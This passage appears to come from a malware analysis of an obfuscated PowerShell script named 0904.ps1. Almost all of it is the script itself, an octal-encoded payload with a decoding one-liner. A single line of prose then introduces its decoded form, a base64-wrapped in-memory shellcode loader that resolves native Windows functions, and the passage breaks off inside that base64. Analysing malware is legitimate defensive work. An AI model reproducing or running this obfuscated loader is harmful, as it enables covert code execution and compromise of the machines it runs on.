101H101l101A101F101S101l101@101S101T101c101<101F101c101@101<101,101T101c101F101@101T101<101l101H101l101A101A101S101S101A101l147F101@101@101<101l101<64S146,165@147<64S101A164@101T156F116F111H142A147S102H124@115S60l150S126c107l150<160T143A171H102S167l143T155H71,156S143F155@106A164A111T107c116<150F142S155A65S166l144<103c102l151@132l123S102,171S144l127H64,147F141A127@64S147c122<105l71<124S111A107S61T166T132l107A125S165F104,121A60l113A112S101<101<101l101S101@101F101,101<101<102<121F122<121A101@101l124@101c105H104H101F103c143,115<162T126S153c101l101l101,101S101c101T101A101,101H101H117A101H101,101l147<105A114H101T121T147F101,101c101l157F101T101S101A101A107T101@101,101<101F101c101A101c101T172H151A147@101S101@101@101S147<101H101<101<101<121c101<101T101F101H101A102F101<101S101F101S147c101l101F101T101F101T147A101T101H102l101,101@101S101A101@101<101H101l101,101c105T101l101A101l101T101,101S101H101<101A101S103F101A101l101T101T101T101<147,101@101,101H101F101l101F101A101F115F101@121H111,125<101A101c102@101@101H101A102H101,101H101S101F101F101@105T101l101T101l105F101,101l101A101T101S101,101,101T102A101F101<101<101S101l101l101,101T101A101F101@101S101,101<101H110<121<157S101c101,102l130T101c101H101l101,101H105,101H101<101,114T101T103@101,101T101@101H101<101A101c101@101A101H101c101H101<101<101H101c101c101@101S101c101c101,101A101A101S107<101<101,101l101H167l101,101H101A101T101A101c101S101H101l101c101,101l101A101c101A101T101l101S101<101A101T101l101T101l101T101F101<101F101l101@101H101<101l101H101@101l101,101l101,101l101c101l101A101T101T101c101H101@101S101,101,101,101F101T101@101A101<101<101c101,101c101@101@101S101c101@101T101@101A111<101S101A101F103@101c101,101@101l101,101l101T101H101,101l101l101l101,101A101@103A103,101<101F101,105F147H101F101A101,101A101@101F101S101T101T101,101,101F101@101,103@65A60S132c130l150@60,101T101H101,101l61T101,147<101l101A101H101@147l101,101l101F101,103T147,101A101c101H101<111T101c101,101S101S101T101@101c101c101c101@101H101c101,101S101H101,101,101<103S101H101T101,107T101c165@143l156<116@171F131S167H101@101c101S114T101,103A101c101<101S101l121,101c101,101H101H101l121A101@101c101@101<115S101F101,101S101<101A101F101H101<101c101F101<101T101c101T101A101@101l101l102@101<101F101H102,101H114H156S112,154c142H107c71S152@101@101S101S115S101T101T101S101<101l107<101T101@101S101@101S103F101T101<101,101F105F101@101l101F101A101c101l101H101<101S101<101F101,101T101c101F101H101c101T101S121A101T101H101,121l147H101@101<101F101,101A101c101l101T101,101A101A101F101@101@101<101T101<101@101T101l103H167S113S101S101,101H101,101l101H101A101l105<147F101F101,101,101S103A101c101F125H101l61S103S101l101l101F113S101<110S101<101H101<104H101A101,101<101A101S121A101S101c102,147@101<101S101<101l101l101,101S101,101T101F101T101S101,101S101<101T101F101F101T101<101H101A101,101<101S101c101l101@101l101F101l101c101A101H101T101A101A101l101@101S101c101c101,101,101<101A101A101,101<101@101l101,101@101<101H101H101,101<101A101H101S101A101l104l131l101A143F147F105F101H101@110H101A157<102c101l101H101H103F147,101@161F110,147l111,157T102S121l101F101H103T151H157,101l101S102F115@167S101A121,101l127c101l101,101c101H101,121@101H101<105l121c101S162A104F167,102l171@106c167H101<101,143T101F157,107,113l101@121c101,101H101T131A101<101@102<143T114S113<53c60@101S101,102H115l167l101S147l101c170c101T101S101l101T101F147c101l101T105A121H101c157A102@167H101T101A103F147@157@107@113c101l147,101F101S101<157,114l102<62H70,112S101@101A101H113S101,101F144@166,103F147F101l101H103,147S167c111@142l167<163<101A101F101c157T103A142F167l167T101@101F101,157A101@103T107H70H116T101H101F101H113S112S151T157H145<101H151l147<117,101c101H101A113H113<147c101F101F101,105l112T124l123A153F111l102T101S101F105F101,101A101F101l101F101S101,167F101H101S101H102,62H115S151,64F167S114F152A125S167A116A172H111@63F101S101@101l101<101F101l125l101l142c101S101l101<101l102H121T103<101<101c101A152A146<147H101@101T147l101F111F101,101c116S167@103H101H101H101@152<125A63@122<171<141A127,65<156<143,167S101<101S101l101<102F143l102F121H101H101c70@101c101S101l101,103<116@126S125T167<102H115S102F147,101S101S105F101l101,101H101T103S116<110H126F125c154S105T101T101A101,101S130<101S131T101A101T105<121T102T101c101H101F152F121A155c170S166F131H147<101T101,101S101H101F101,101F101,101<103T101H101F101<102l122T61S125c103<101@101c153T101S101S101l101@101c53F147F105<172,101F102T131l101H101@101H105l101F101T101<101H122c101c101,101c101F101<167<101c101<101A101A125S101S101@101S101S103F101@101@101<101<104S167l101,101c101<101T121c101@101<101,101l102@101T101T101,101T101F147F101c101S101,101H105H101S101F101H101F105F101c101c101<101<101T101l101T113T101F101T105c101c101,101,101A101@101F101F131T101T117A101l101,170<101@101@157F101,130H101T101l57F101T101,131F101l150l101l102@170H101T101S131@101@167F167A103l156c101,101,131A101@63<167<103S156,101c101A131H101H104A147S110,165A101@101l131F101<114<147A110l165,101S101F131F101@126l167<105A170<101@101<64,101@146S167l106@160c101@122<111,101c66H101l110<102A101A122<111c101H102<121F114A102@101c122l111T101c106H121l114F102c101@122H111@101c115H147@114c102,101F122T111@101l123l147@114l102<101@121l131,101T153S147A112@172@101<150,111T101<156H167<113l153@101H121H131A101@166A167l113S166F101S147@101T101T101H101l101A102@101<101A101H101@101<101H101<102F101T101A105,101H101S121@101,121H101@102l153,101A101@101T101S106l101S101S105T101S101A121c101,102,101,102c101<101A111,121@101l101@101S101S153,101<101c121<101@104A101F106F101S147@101l101S101A101H101,112A131@101,132H147c101@124<101A101,105F101l130A151c101S101@101F101<101A101T150l150H150l162H101l102c143,101S101c121A102H157S111@101F101S101F101<101<104l107S101,112@101H101l107A167T101@102S101S111A167T147c101l101S101F101,101F112A131l101F155H147S101,150T101A101,111T101,171@123l101@101@101F101H101S101H150T150@150T162@101H102T143c101A101<167F101l101l101<101<105F101l154F121T105H101T101F101S105H101<157,101A105A150c101S107,163,101,112A147,101,170,101S107@163,101A114A101F101A65T101@107@163l101A106@167c102H102F101H106<70l102F111T121c101T112F101T107c163S101c106<167H102c112c101l107@163@101l115T121H102<122A101,120A64H102F123S147T102S132,101l102T64H103<124S167F102<150S101T103H60S103T106H167<102<150<101A104c163T103c126A147A102A160T101T106@167l103<127S167F102F170A101l107A153<103S131l101A102F160T101<113c147,103T132S121,101S122,101F107c163A101<106H167@103@112l101A107<163c101,106A167@101A156,101A110T163F101,144,167A101@165F101,102<115,101l146@101<101H165@101c102<163S101l150H121S102S152c101@104H115A101c116H147c101H111@101c101F131,101S160c101@101T70l101@107,64,101<102l111T101c101S101A101,101,101@101c101S101T101,101F101S101l101H101H101F101,101<101@101c101<101l124l101l105F101S101@101@111c101H101F101H101@101F101H101T101T101c101@101@101<101F101<101,105A101A113F101S101T101H101@101S101F101l101@147H101,101H101c101l101A101T101S101T101S101A101,101H101T101T103,147c101A57l101H101A101F101@101,101T101F103@101F101H101F101,101T101T101c101T101c101H101A101@101A101c101@102A101@104F105F101T101,101@101T101A101T101S105c101<101l101,101l101l101H101S101A101F101l101@101l101T101<105<105@101,160A101c105c101<101A101@101<101F101c101,101,101F120H105,61l166F132T110@126,163<132<124F64T101c143,107<71A63,132F130A112S172A141S107c126T163S142l103H65A154F145F107F125T101F125H110@112<166l132F63S112H150<142,121H102T124,131l127F61@167H142S107S125c101T142<130l116<152@142A63T112@163,141c127<111T101<125,63F154A172c144T107c126@164H101A105A71@151H141H155c126S152,144<101T102,124c145l130@116,60A132H127A60<165l121,62l71,165<132@155S154l156<144H130F112,150,144H107l154S166l142T151T65F112S142,156A116T60H131S127c170@163@101c105H154@165c143,63T122T150c142@107S170l154H143,147@102c116T131S127S154l165F101T103S65<152c144,107@71S171<101A106<116@65@143<63T122@154l142,123T65F104<142l62@170@163@132,127F116A60F141<127T71l165S143<167l102H112H122@107A154F152<144H107S154S166<142l155S106c171H145<121<102c126F142c155T154A165c143F63H122c150<142<107T167c101c125l156l126A165A125c106S116c104F142F62H61,164A131,127@65A153,101S106<116@65l143l63A122,154A142,123F65S124@132T127c116A61A143,155c154@60H145c123c65@121T132c130c112F164A141H130<116H172F141c127<71c165F143,167T102l124@132c127H116A61l143,155F154<60H145<126A102H154F143c155A61H160,143A63A116l160<142F62c65A102S144A110H122A171A141A127c112H61H144c107A125<101@125l62A126A152A144@130c112c160T144<110,154,102,131H63l122T160T142H62@64F101H125F63S154,172A144<107H126S164<114S154F112l61<142@156<122S160<142@127@125A165A121A62,71<164H143c107F154,163H132A130S112c124H132S130A112<62H141H127A116<154T143,167F102F104H142T62@61c167T141<127c170T150@144l107T154T166,142,154S112T154@142c107@106l64F131l130c122l160<142S62,65S172c121H130A122@60F143A155c154l151<144@130,122H154A101,106H112<61,142H156<122T160l142@127@126<104,142S62F61F167,131A130T122c160@131c155F154@163@141T130S122l65T121H130l122F60F143,155F154l151,144c130<122A154l101,110T102c166l144c62,126c171,143c62H150c154H142,107l167,101S121T62<71<165F143A62T71@163F132A121A102T130c143c155A154l60H132,125A170T160T142F155c125@101@125T63@154c172@144,107@126T164S114F153A116T166A142c130A102,166T142l155c126c165@144T105A61c166<132F107l126H163A101,106c112l61<142c153H154S165,143,63S122A150c142,107<170<154A143H153l106H60T144@110l112c160F131@156H126,60T132<121c102T172<131<130F132H154S132,106<116S60@131A130<122H154c101H107l116<164@132T101@102F124c145,130l116@60<132S127<60c165,124c127,106A165,131<127T144,154,142c127l126<165S144S103F65<102A144@130T122@166l142A127A106H60,141H127A71<165l101T106T116F65,143S63S122<154,142<123<65c116<131,127@65,150S132S62T126@164F132,127H65l60l114,153F106,61,144H107F71<164S131H130F122T160l142S62A64<165S125,156T126c165l143,63l102l150@131S62c126<172S101c106,112A61@142F156T116c167,131T127F116,154c121l62S71@165@132@155l154c156S144F130c112,150,144A107,154,166l142T147@102A104@143,155A126l150<144F107S125@101c125@156A126S165H143@63S102A150T131c62@126H107T131,127A116A60S142F63l112H65c101c106@112A61A142T156@116<167,131A127c116F154H101c105S116@171A132A127l106<60l132S126l112H61H142H156A116@167,131,127S116A154T101c105A71,167A132c127<64H101l125S107,154<167S132@127T170A160T142F155T125H101l121l63,112S154,131H130S122<154@125@107A154H167F132l127l170H160,142@155T125T101,121c62S71H164<142F127<106l165S132S105H116S166S142c107S170,154,131l63T122T160A142,62c64F101c132c62c126,60T130l60c116H166,142c127H61S150H142@155S122<172,101S105T106,153c132<106@116<152<143A155T154A167,144@101<102,124A145H130@116T60,132F127@60H165T121S62F71A163H142T107S126S152H144c107H154,166l142H156c115l165@124l62T112F161T132<127A116@60c124H127A71<153F132,127<167S101,121S62l71,163S142l107<126c152<144l107<154T166S142l155F101H170F101S106,102S124l124T62l112A161,132S127l116c60A101H105<154,165F144S155T71H162c132T121,102T124S145c130S116@60F132T127F60H165l125@62H126A152l144S130<112A160l144F110@153T101c126F127T65,62,132l130@112H160l132F155<154F150A131,155l170c154T121S62@71@153@132@125S106T60c144H110A112H160F131T156<126H60c132,121l101T101F101T101T101H101S106A125l167T101c145A121@102<122@101<110c153A101,126A101,102H62,101H105H105c101l124,167l102T65H101H107F70c101@101F111S104A126,141<121T102S154T101@110<147S101S111A101c101l157A101S106,163,101@126l101c102T154H101c110T147c101c144@101F101A165F101,105<125T101c142S147l102l152c101l107A70F101S132@101<102S160H101S107@64S101A132F167@102F144F101l104l157S101@117S147F102c102l101l106,115,101F121H167F102<112c101A105l153<101c114S147c102l110T101F107A125c101l144T101F102c124H101<110T121<101,143F147F102c160<101,107H64,101H132<167@101c157@101S106S163l101F121S167A102F166@101<107A64S101l144A147A102l154S101H110<111<101H144A101,102c144l101F104F157H101l117A147F102,107<101c110@111F101,142A167H102,164l101l105T111<101S131<121<102l172<101l107,125T101<116@147F101@60F101F106A115H101S144S101A102@171,101l107F153c101T142,147H102S156T101S103F147F101H113c101<102F156S101l110l101l101c111A101@101l156,101A105@147A101c123@167,102S104S101l106c125<101<117T147F102,143A101,106l115@101@124@167@102c107<101F106l121T101l126F167T102<102c101A106T111A101H122A121T102S143T101c105c60l101l141l121,102c152A101l110c111,101c142@167l102<172,101A107,70<101@132@147@102A60@101,103S143c101l113,121S101@165H101H106F121l101l124l101@102H60T101S110S105c101A144S121F101S160<101,103c153T101,113S121T101H102<101<101c102H132F107c102@141A63H111A160F141,106S121c160F106H122l170A60H146@105<105H131T155F132l101l101A151@63F145S154T170H127H107T124l124A147,151@121c151A167F120F61A71S57@105A144<125,113@117<147F115c101@101S101@105F104A111A101A101c102F102F123<101F102F101,122@111F116A102F101,101,102T101S121@64F106F111A101F105H102,105<122@125F105A111F101,105H102l103F101l121<147c101T121T105@103<102l121,105F101F101H121<101c101@102F101T143l103<104S147A111l111F115H142l70T64T126F161S60F62,124F152l125@105F101T101T101<123H113A121H131H101S101l122<111,170l105F151,153F105@111<101T101F123,116<121T121H147@101T102l111@65<102@103c101<102S101S121c64c111F111T101<101S126,105S152l60H102T105F153@105<111<102,167@115A123<113H122S111A170@105F152S125c105F101S121T101A101,101@101F147S102c101<101F147F101A101H101@101l101@101S102@64c102S101c101@105l101c126S101l111H127,126@63H112<150l143T105c65c166S142S153A126,64F131<62H126F167,144<107c154A166H142T154H122,157<143l155,71A63l143<167T107,101A156,151@64F102,147,111S122<124H145,130,116@60,132T127<60F165<125c62<126S152@144H130S112l160c144<110S153@165,125A107<126l171F142@127l154l172,143A62F154S166H142A156T115T165,125@62H126S152S144T130S112T160H144,110A154T121@132@130S112A164c141H130S116c172H141@127F71@165F121l130H122l60T143H155F154c151S144F130F122<154F114,103H102l164l143@62<116T166A143A155@170S160@131<151c167c147F126,155T126S171S143T62T154l166H142T152T60H171T114c152,101A165,115T103A64@167@114T103S102l104<144H127F170<60H144F130@112l154<120A127T65F154c144,130l122A171S131A127<167S163,111c106F102S61S131T155S170H160T131@60F164A154c145<126F122,166<141l62A126c165l120c127<111c63c116H62F105S61S131c172c125@62c115H124S153H172c116,107T125F167c117@104l153F126,101A126@121A103S105@106@116F162T141A130@102H127S132A130A112H160A132@155H154A152l131@130l122F160l142F62A64F102A156S103S147l101S101T101A101l101l101A101S101A101F101c101A101A101H166F151T147c101l101,101T101,147<101l101l101<101S101<101H101A101,101,101A101F101H101<101T101A101S101@101<101l101T101,101@101l101H101,101,101<101S101F114l101<157<101S101@101F101F101F101,101l101T101F101l101<101l101T101F101H101T101<101l101c101,101@101A101<101<101,101c102T146c121l62T71T171<122T130c150@154,124H127@106<160,142<147H102H164F143S62H116T166<143c155A126c154S114S155T122T163,142A101<101l101S101F101H101S101@57A171c125H101T111H105S101S101S101<101l101S101T101l101<101S101@101,101<101l101l101F101,101c101H101@101A101A101@101F101<101@101l101A101A101T101F101c101@101T101,101<101l101l101,101c101l101l101F101T101,101H101l101l101A101S101@101F101l101<101F101<101F101H101c101@101H101c101c101T101l101F101,101l101A101A101S101,101H101S101T101,101S101H101c101A101T101H101S101,101c101T101F101@101l101F101l101@101,101F101F101l101S101T101F101<101S101T101,101<101c101,101l101<101<101l101l101<101,101@101,101@101A101F101F101c101l101@101A101@101T101F101T101@101F101H101l101H101,101<101H101H101H101,101S101F101l101F101H101@101@101S101F101H101S101l101@101@101T101c101F101T101H101H101c101H101S101A101<101F101l101@101F101H101F101l101@101S101<101,101T101T101@101T101A101,101A101<101T101H101c101l101<101<101@101F101c101S101S101T101@101T101H101H101<101H101A101@101c101H101,101S101S101T101H101l101l101A101A101c101H101H101H101H101l101S101F101<101@101A101S101l101T101<101F101@101T101@101S101@101A101,101l101@101H101S101,101F101H101c101,101,101F101T101c101c101l101l101H101,101,101c101<101T101,101T101F101@101,101F101<101S101S101S101F101A101T101<101T101A101l101F101H101S101l101S101@101S101l101l101F101T101c101T101l101@101<101c101c101A101<101<101c101<101@101T101S101A101c101c101H101<101T101<101l101T101F101,101A101F101<101A101@101S101H101c101H101H101l101,101H101,101@101<101,101<101l101@101@101l101@101A101c101T101<101H101A101F101,101l101c101A101,101,101@101l101,101F101<101c101,101,101,101A101@101<101H101H101<101F101,101l101S101H101@101l101S101H101<101<101A101,101S101l101l101F101F101F101<101c101<101,101T101<101T101@101S101l101c101S101<101l101S101<101@101,101T101S101l101l101@101H101l101@101<101@101F101l101S101c101S101A101,101<101<101l101F101H102,101A102T101A101A101c101,101H131@101H101l103c101c101A101F101,101<101H101F101<101,101S101H101S101H101A101H101T101S101A101F101c102,101@101@105c101F101H101H101<167S101T101H103c101H101H101l101F101A101c101A101H101S101T101F101A101A101H101l101c101A101H101,101S102c101H101A101,101,101,101l102c111F101c101A101A101T127@105A101,101l101c106T121<103@101l101@101,101,101F101l101F101A101S101S101,101l101T106@121H103l116@101<101l101<101A106H131@101<125T167S102A146A101F106@131H101@122T121T102l123,101l106c115<101A123@121c102T120l101H105F64,101l130@167T102,112c101H105@64F101S122T147@102A120,101l101H101@101<101,101c103H71H102T117S57S53H101A101T101A102S101S101H101c101c101S101A101@101,101c101<101,101c101<101l101,101A101H101<101F101T101@101F101S57,101@101@101c101c101l101c101l101<101,101l121A101T101l101F101,102,101<101c101@101c101F101T101F101H101<101F101F101@101,101H101<101,101H101F101H101A122l101A101A101F101H101T105H101l126,147<102A150F101H110H111F101H122c147F102@160S101H107@167T101H132H121T102S112F101T107T64A101H132A147S102S166c101A101<101c101S101c101T101A153@101c101@121,101A101c101<102H125F101,110T111,101A131l121@102<165T101S110<115@101,142c101c102S150S101T110A121,101,141@121@102T166F101A107,64,101@101l101F101l101T101c101F101A101H163@101<123c60l101T121T101l101S101c121,102@124,101l110,121A101c143,147@102A160A101@107H64S101T132S167,102S107F101l107l153F101H142T101S102,154l101,105l153H101H142c147c102T155F101l107T70@101c101A101<103l121,101S121c101F101<101H121<101A167l101A104S101@101T115H101c101l167H101l104c101c101T116c101l102l151c101@104@101l101@101T101@101c163A101T101T111l101l101T121A102H107H101c107,153c101T142H101T102c154c101l105S121F101<132F121F102c172c101l107F115S101A143l147<102S160F101S110<101T101A144c101<102A160F101@107S70H101A142A147T101F101A101F101l101c101l111@101S101T101A101S104<101F101H103A101S101S102,101,105@131c101A141F121T102c163@101c107,125c101T126@147@102@154@101S110@111,101<143,167l102S160<101@107H70l101S142H147T101H101,101F101S101l101c115S101T101<165@101@104A101S101,114<147A101S167F101A103,64<101T115c101H101S101T101l105F101<101,104H167l101S102l101A105F153c101T142T147F102c60S101@107S125H101S143@147H102,165F101F107S105<101l142,101l102l117A101F107<105S101,142A121A102c154A101S101H101c101c143c101T102,166c101H110T143c101A132F121F102S171,101l110T115@101A141H101l102H154H101F107c167H101A142S101,101,165,101@107,125A101,145@101S102F154A101l101l101T101@101A101c101,157A101,101@111A101,101H121<102l115F101F107H125F101F132H167A102,150T101H107,167l101H121H167H102c166<101S110,101,101c145,121F102F171c101c107H153c101F132c167T102c157<101<110T121H101S101S101c101l147A101A101F101l101<123S101T101<120c101F101,105,101,124@167@102,171H101H107c153S101F132l167F102,160S101H107,64T101F131S121A102F163A101,105,131<101T141,121c102F163@101H107<125l101<142A147c102<150@101S107@60c101T132F121,101l101l101,110,101l101S142H167l102,63<101@107<125A101T143@147H102H172T101,107c147A101F132H121S102c163@101c107S167S101T114F147<102F154F101F110c147A101c132H121<101A101,101l101,101F101F116A101F101H111S101,101T105@101<125T101l102<171H101c107l70l101<132S101A102F61S101,107,115c101H144H101S102F127,101A107A125c101,143A147F102S172@101<107S153H101F142c167A102l165@101c101l101l101A115F101@101T165<101A104F101l101H114,147@101,167S101,103,64H101<115A101<101<101H101,104@147@101,103@101l101H102S101,105<105,101c143A167l102F172T101S107F125A101H142l121c102<151S101<107T167l101T145l121S101T147l101<106l131,101@132F121c102l171c101<110<115F101@141T121A102@166T101<107,64@101T101A101H101l167l101F103,64@101A115H101<101A165,101T104S101c101l114<147,101,167@101l101<101H101@101A101T101A101c101S101<101A101l101l101l101S101H101A101S101H101@101A101<101@101T101,101H101<101<101l101,101H101<101F101A101,101F101c101<101H101l101c101@101<101,101H101T101,101F101T101l101c101l101l101S101<101H101S101c101<101c101H101F101H101T101A101<101H101F101,101,101T101F101F101T101<101,101@101H101@101A101S101S101A101<101@101@101T101S101<101T101T101l101S101F101F101l101l101T101T101H101@101,101A101,101@101T101F101<101c101<101S101l101H101<101F101c101F101c101H101T101A101F101@101@101F101,101@101@101F101,101F101l101H101F101c101l101T101T101@101@101@101,101H101l101,101A101A101T101F101@101c101@101@101F101@101S101<101@101c101@101H101,101F101l101<101H101,101F101F101<101T101T101l101T101T101@101<101,101l101,101l101H101<101T101,101T101,101,101<101A101A101F101<101,101<101S101T101H101H101l101A101S101F101A101c101A101H101,101S101<101,101S101<101<101A101S101F101<101<101S101F101T101c101S101A101<101F101S101T101@101S101<101<101@101T101H101<101T101S101A101H101H101l101l101A101F101,101l101@101@101l101S101<101H101,101@101l101H101F101,101,101,101S101H101c101A101H101c101H101A101c101H101T101T101F101T101H101@101l101T101H101H101<101l101,101l101<101@101A101H101H101@101l101S101@101l101F101c101<101S101c101A101H101T101F101S101c101T101F101@101T101A101<101A101,101@101T101<101,101T101H101<101c101@101S101A101<101A101l101H101,101l101F101<101H101l101c101l101l101,101T101S101c101A101<101l101l101c101H101l101S101l101,101,101,101T101A101<101H101l101l101@101l101H101l101<101T101,101@101S101F101<101T101l101c101<101@101A101<101A101l101@101c101T101T101A101A101A101T101@101H101S101A101T101F101T101c101l101A101H101,101A101,101<101F101,101H101@101<101H101T101c101F101@101<101l101l101H101,101H101H101S101T101l101F101S101H101S101,101@101H101H101F101F101T101T101H101T101H101c101S101S101A101c101<101<101S101F101A101l101<101,101T101A101A101<101A101S101c147c101c101l101@115T101F101H101,101H60T104T147,101l101S101,101H101c101S101H101A101H101l101T101A101@101F101,101c101<101F101A101@101,101c101,101S101S101H101S101T101<101T101<101H101@101l101H101@101l101c101<101@101c101F101c101T101l101@101l101,101<101l101@101<101T101S101<101T101F101<101T101S101,101H101T101S101l101l101,101,101l101F101<101A101S101<101F101@101c101A101A101,101c101F101T101H101S101H101@101,101l101H101<101F101l101,101T101S101<101<101c101A101S101<101H101S101F101F101T101,101A101<101F101@101S101,101F101c101@101H101,101H101@101l101c101H101S101H101T101H101S101F101F101S101F101F101<101S101S101@101T101A101l101T101F101S101l101l101@101T101c101T101F101c101A101c101H101,101c101,101S101,101,101T101<101T101<101S101@101l101<101,101H101<101T101T101@101S101,101l101H101T101@101c101T101c101A101F101@101S101l101A101S101S101H101@101c101<101H101c101A101A101A101<101@101c101@101A101S101T101l101S101T101S101l101,101c101@101,101<101<101l101A101S101c101l101A101c101<101l101<101F101A101F101,101@101A101S101S101@101@101H101c101l101H101S101<101T101<101T101T101@101<101<101T101A101<101S101A101T101F101,101A101c101c101F101@101<101l101@101<101T101,101A101,101l101F101l101H101H101,101<101T101,101c101<101,101l101l101H101l101F101c101F101S101S101S101F101,101F101F101F101@101<101F101c101l101T101@101<101<101H101F101A101H101,101H101H101,101,101S101<101T101@101<101S101@101T101A101c101T101l101<101T101S101l101A101c101@101l101S101F101<101c101c101c101H101,101F101l101l101T101l101l101T101<101,101F101c101<101<101A101H101S101c101S101@101c101@101S101l101F101l101H101S101H101T101S101l101A101l101F101H101S101<101S101S101<101<101A101l101S101H101l101,101l101l101T101l101H101A101S101H101S101H101@101H101<101l101F101H101H101,101T101,101<101T101c101<101S101@101c101S101c101S101A101l101<101,101@101S101S101H101,101A101l101A101T101A101,101,101H101<101<101F101A101H101@101l101S101T101l101c101H101<101S101A101@101<101S101c101@101c101@101T101@101T101S101S101c101H101T101c101H101T101H101S101F101T101<101F101,101,101A101S101H101H101T101S101@101H101H101,101c101A101F101l101<101F101<101,101S101c101<101,101H101A101A101S101,101,101F101H101c101S101S101@101<101H101c101<101,101,101,101c101S101T101S101@101c101T101c101A101@101<101<101c101<101H101F101S101<101A101@101H101A101F101<101T101H101<101S101H101H101<101,101c101S101@101,101T101A101F101,101F101A101c101A101c101c101,101<101l101l101A101@101T101l101<101H101c101<101@101c101<101<101<101T101,101,101,101A101c101@101S101H101<101A101H101,101T101A101l101@101<101<101T101@101,101F101<101S101S101S101,101F101,101A101F101H101l101,101l101,101S101S101T101A101H101c101,101A101S101<101l101T101c101F101H101@101A101H101S101H101H101A101c101c101S101c101@101S101S101H101F101H101S101,101@101@101@101H101S101,101<101T101@101T101l101A101l42<73@15T12H133F102S171c164@145A133F135,135H44F104@154S154T102T171A164F145,163c40l75,40,133l123H171F163<164H145,155<56,103<157,156S166<145,162A164S135,72H72A106F162@157l155T102F141F163l145T66S64T123c164T162S151A156F147F50l44l146H102S146@151S166S105c51H73l15S12<133A123S171T163<164l145H155F56@111,117S56,106F151F154A145A135@72T72c127H162A151F164l145A101T154l154c102S171<164l145@163<50l44<172H171c151T130,117F125<132H126H54F44S104T154@154@102c171T164T145F163A51H73<15S12c11T15,12F15,12@15c12,44F112l120@147@122<123c110,40S75A40<42<44<105H156@166A72@101S120S120H104,101,124,101@134A115@151<143F162@157S163T157A146<164A134c127S151c156F144T157,167c163,134T123,164T141A162<164F40c115l145c156l165@134l120T162,157<147T162T141c155H163S134l123@164F141T162T164S165T160<42@15l12H15c12H44l111S157l171c125c141S103H145T40S75l40@116T145@167@55@117F142F152H145H143S164H40F55<143T157H155F117A142F152H145c143@164,40F127,123T143@162l151l160l164F56l123S150T145<154,154,15c12c44S162F145,152,132F167A146@115<102@40T75S40A44T111<157F171T125c141c103@145F56c103,162H145c141H164A145c123H150<157A162S164H143,165@164H50T44l112S120l147F122,123T110,40<53<40l42l134@161<146l103T122@165A145,56T154c156<153l42T51,73T15A12A44A162@145S152F132A167l146A115<102c56,124H141<162l147c145A164l120H141,164F150c40@75<40T42H45A123H171F163F164@145c155@122F157l157A164<45@134c163@171T163F164,145H155@63,62T134,155T163H150H164@141,56<145<170S145A42<15@12c44<162<145A152F132H167S146,115l102S56S111,143l157F156A114,157c143l141c164F151H157A156,40l75,40@42l45l123c171T163T164c145@155,122,157@157<164F45A134H123A171A163,164,145<155F63<62@134<123H150S145S154<154l63<62l56A144F154A154,54l62c61T42H15T12F44l162<145l152F132A167c146<115S102<56S101A162@147T165,155@145T156@164H163c40c75A40@47@40@40H40A40c40T40T40@40S40c40S40F40H40T40T40T40A40<40T40H40c40T40@40T40A40A40S40T40@40@40T40S40c40S40A40c40A40A40A40S40l40A40c40l40H40F40A40,40l40<40A40c40c40F40@40@40<40l40S40F40F40l40H40A40A40@40l40<40S40T40H40,40H40c40<40,40<40<40<40,40S40F40H40@40A40S40@40S40,40<40<40A40A40F40S40A40c40A40A40,40A40T40S40S40l40F40A40<40l40c40T40@40S40H40F40T40,40F40T40l40T40,40l40F40A40c40c40A40@40F40F40A40@40<40T40H40S40@40T40<40,40S40l40A40@40c40H40l40c40S40@40l40<40l40S40,40A40l40<40c40,40T40c40c40S40,40@40c40H40@40F40H40l40S40,40A40<40T40<40T40T40<40T40<40<40@40@40T40l40H40<40@40@40T40,40c40S40c40F40S40<40@40H40l40A40H40l40<40l40c40F40H40@40A40T40A40,40F40c40l40l40H40A40F40<40A40S40T40l40<40A47<53@40F44@157@147S125S157A151T15S12<44l162T145T152H132<167A146@115S102F56l123T141@166<145T50<51,15,12S15@12l123@164A141A162l164T55,120S162S157c143A145A163<163<40F55,167c151A156c144<157T167c163@164H171@154H145T40T110c151@144T144S145H156T40,55c106T151H154,145<120l141T164@150@40A42l155@163H150@164F141,56<145l170<145A42,40S55l101,162S147F165c155@145S156A164l114,151T163H164H40S42T44S157<147,125A157l151S42T15,12,11H15A12'-SPlIt'<'-sPlIt 'H'-SplIt'S' -SPlIT'c'-SPlIT',' -SPLiT 'A' -sPlIt 'l' -SPliT 'T' -SplIt '@'-SPliT 'F'| %{ ([ConVErt]::TOInT16(( $_.ToStRinG() ) , 8 )-AS [CHar])})-jOIN '' ) 
```



Decoding **0904.ps1** will result in the following:<br>


```powershell
###

$xghxU = "DQoja3dqQ1FvYlNRVg0KI2t3akNRb2JTUVYNCiNrd2pDUW9iU1FWDQoNCiRTck5pbiA9IEAnDQpmdW5jdGlvbiBmdW5jX2dldF9wcm9jX2FkZHJlc3Mgew0KCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9j
ZWR1cmUpCQkNCgkkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcyA9IChbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfCBXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1Bbm
QgJF8uTG9jYXRpb24uU3BsaXQoJ1xcJylbLTFdLkVxdWFscygnU3lzdGVtLmRsbCcpIH0pLkdldFR5cGUoJ01pY3Jvc29mdC5XaW4zMi5VbnNhZmVOYXRpdmVNZXRob2RzJykNCgkNCglyZXR1cm4gJHZhcl91bnNhZmVfbmF0
aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRQcm9jQWRkcmVzcycpLkludm9rZSgkbnVsbCwgQChbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZl0oTmV3LU9iamVjdCBTeXN0ZW0uUnVudGltZS5Jbn
Rlcm9wU2VydmljZXMuSGFuZGxlUmVmKChOZXctT2JqZWN0IEludFB0ciksICgkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldE1vZHVsZUhhbmRsZScpKS5JbnZva2UoJG51bGwsIEAoJHZhcl9tb2R1
bGUpKSkpLCAkdmFyX3Byb2NlZHVyZSkpDQp9DQoNCmZ1bmN0aW9uIGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgew0KCVBhcmFtICgNCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlKV0gW1R5cG
